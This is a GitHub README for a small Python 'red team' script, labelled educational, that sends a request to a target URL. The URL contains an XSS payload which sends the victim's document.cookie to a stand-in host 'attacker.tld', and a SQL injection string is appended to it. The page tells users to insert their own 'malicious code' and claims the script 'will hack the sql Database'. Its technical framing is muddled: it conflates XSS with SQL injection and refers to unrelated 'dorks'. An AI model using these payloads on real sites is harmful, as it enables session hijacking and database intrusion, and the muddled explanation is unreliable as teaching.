Skip to content
/ SQLp-EDU Public template

Example Python script that demonstrates a simple example of a Cross-Site Scripting (XSS) exploit for educational purposes only. This script is intended to be used responsibly, for learning and understanding the security implications of XSS attacks, and should not be used for any illegal or unethical activities.

License

Notifications You must be signed in to change notification settings

VolkanSah/SQLp-EDU

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

38 Commits
 
 
 
 
 
 
 
 

Repository files navigation

SQLp- SQL XSS Exploit Script Example for EDU

RedTeam Scripts by Volkan Sah - simple codings for 'Offensive Security' (Update 2023)

Screenshot

RedTeam (Black-Python-Script)

This is a Python script that demonstrates a simple example of a Cross-Site Scripting (XSS) exploit for educational purposes and ethical hacking only. This script is intended to be used responsibly, for learning and understanding the security implications of XSS attacks, and should not be used for any illegal or unethical activities.

Warning:

This script is intended for educational and ethical purposes only. The author of this script do not condone illegal activities and are not responsible for any misuse of the extracted dorks. Always use the extracted dorks responsibly and in accordance with the law.

This script is part of a larger collection and was created to be used with caution. This is a Black-Phython-Script it will hack the sql Database of a website. For any damage you will pay, if you do not know what you do!

Prerequisites

  • Python 3.x
  • Requests library (can be installed using pip)

Usage

  • Clone the repository or download the script to your local machine.
  • Install the required dependencies using pip if not already installed:
pip install requests

Modify the url variable in the script to the URL of the target website that you have permission to test. Customize the payload variable with the SQL injection code or other malicious code that you want to inject. Run the script using Python 3:

python3 sqlpay_xss.py

Example code

#  ---------------------------------------------------------------------------------------------------------------------
#  ---------------------------------------------------------------------------------------------------------------------
#  -------------------------- for educational purposes and ethical hacking only ----------------------------------------
#  ---------------------------------------------------------------------------------------------------------------------
#  ---------------------------------------------------------------------------------------------------------------------
import requests
# The URL of the vulnerable website & attacker
url = "http://vulnerable-website.tld/login?username=<script>document.location='http://attacker.tld/log?cookie='+document.cookie;</script>"
# example payload to inject SQL code, set to your needs
# you can ad more payloads here!
payload = "' OR 'a'='a';--"
# The final URL with the injected SQL code
url_with_injected_sql = url + payload
# Send the malicious request
# e.g
response = requests.get(url_with_injected_sql)
# some other stuff!
# Print the response
print(response.text)
# end if ;)

The script will send a request to the target URL with the injected SQL code, and the response will be printed to the console.

Disclaimer

This script is for educational purposes only and should not be used for any illegal, unethical, or malicious activities. Always ensure that you have proper authorization before conducting any security testing or penetration testing on any website or system. The creator of this script is not responsible for any misuse or damages caused by using this script.

issues

Issues to this script are not accepted as it is intended for educational purposes only and not for production use.

Thank you for your support!

  • If you appreciate my work, please consider becoming a 'Sponsor', giving a ⭐ to my projects, or following me.

Copyright

License

This project is licensed under the MIT - see the LICENSE file for details

About

Example Python script that demonstrates a simple example of a Cross-Site Scripting (XSS) exploit for educational purposes only. This script is intended to be used responsibly, for learning and understanding the security implications of XSS attacks, and should not be used for any illegal or unethical activities.

Topics

Resources

License

Stars

Watchers

Forks

Sponsor this project